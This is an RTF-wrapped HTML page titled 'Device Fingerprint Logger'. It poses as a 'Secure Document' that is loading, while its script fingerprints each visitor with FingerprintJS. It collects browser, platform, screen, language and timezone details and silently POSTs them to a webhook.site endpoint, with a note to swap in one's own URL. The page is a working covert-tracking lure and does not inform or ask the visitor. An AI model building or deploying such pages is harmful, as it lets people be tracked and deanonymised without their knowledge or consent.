{\rtf1\ansi\ansicpg1252\cocoartf2709
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fswiss\fcharset0 Helvetica;\f1\fnil\fcharset0 HelveticaNeue;}
{\colortbl;\red255\green255\blue255;\red38\green38\blue38;\red255\green255\blue255;}
{\*\expandedcolortbl;;\cssrgb\c20000\c20000\c20000;\cssrgb\c100000\c100000\c100000;}
\margl1440\margr1440\vieww11520\viewh8400\viewkind0
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5760\tx6480\tx7200\tx7920\tx8640\pardirnatural\partightenfactor0

\f0\fs24 \cf0 <!DOCTYPE html>\
<html>\
<head>\
  <title>Device Fingerprint Logger</title>\
  <script src="https://openfpcdn.io/fingerprintjs/v3"></script>\
</head>\
<body>\
  <h2>Secure Document</h2>\
  <p>Loading secure information...</p>\
\
  <script>\
    const LOG_ENDPOINT = "
\f1\fs28 \cf2 \cb3 \expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 https://webhook.site/c47ebc0a-0fcc-4657-bc7b-cb9d0c0d0c71
\f0\fs24 \cf0 \cb1 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 "; // Replace with your URL\
\
    FingerprintJS.load().then(fp => \{\
      fp.get().then(result => \{\
        const visitorId = result.visitorId;\
        const data = \{\
          visitorId: visitorId,\
          timestamp: new Date().toISOString(),\
          userAgent: navigator.userAgent,\
          language: navigator.language,\
          platform: navigator.platform,\
          screen: screen.width + "x" + screen.height,\
          timezone: Intl.DateTimeFormat().resolvedOptions().timeZone\
        \};\
\
        fetch(LOG_ENDPOINT, \{\
          method: 'POST',\
          headers: \{ 'Content-Type': 'application/json' \},\
          body: JSON.stringify(data)\
        \});\
\
        console.log("Fingerprint sent:", data);\
      \});\
    \});\
  </script>\
</body>\
</html>}